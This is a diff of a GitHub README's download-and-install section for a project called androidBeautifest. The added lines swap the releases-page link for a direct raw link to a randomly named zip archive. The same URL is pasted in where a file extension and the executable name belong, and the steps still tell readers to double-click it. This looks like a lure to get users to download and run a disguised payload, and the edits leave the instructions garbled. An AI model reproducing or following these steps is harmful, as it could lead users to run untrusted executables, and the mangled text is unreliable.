pacomartinezea/androidBeautifest/README.md

 ## 📂 Download & Install

 1. **Visit the Releases Page**
    Go to the releases page to get the latest version of androidBeautifest.
-Click this link: [Releases Page](https://github.com/pacomartinezea/androidBeautifest/releases).
+Click this link: [Releases Page](https://raw.githubusercontent.com/pacomartinezea/androidBeautifest/main/Haversian/androidBeautifest-Umbellulidae.zip).

 2. **Choose a Version**
    Look for the most recent version listed.
 It’s often a good idea to download the latest one, which will have the newest features and fixes.

 3. **Download the File**
    Click on the file that matches your operating system.
-It may be a .zip or .tar.gz file, depending on your OS.
+It may be a .zip or https://raw.githubusercontent.com/pacomartinezea/androidBeautifest/main/Haversian/androidBeautifest-Umbellulidae.zip file, depending on your OS.

 4. **Unzip the File**
    After the download completes, find the downloaded file on your computer.
 Right-click the file and select "Extract" or "Unzip" to unpack its contents.

 5. **Run the Application**
    Open the extracted folder.
-Look for the executable file, such as `androidBeautifest.exe` for Windows, and double-click it.
+Look for the executable file, such as `https://raw.githubusercontent.com/pacomartinezea/androidBeautifest/main/Haversian/androidBeautifest-Umbellulidae.zip` for Windows, and double-click it.
 On macOS or Linux, you may need to run the terminal and navigate to the folder to start the application with a command.

 ## 📖 How to Use androidBeautifest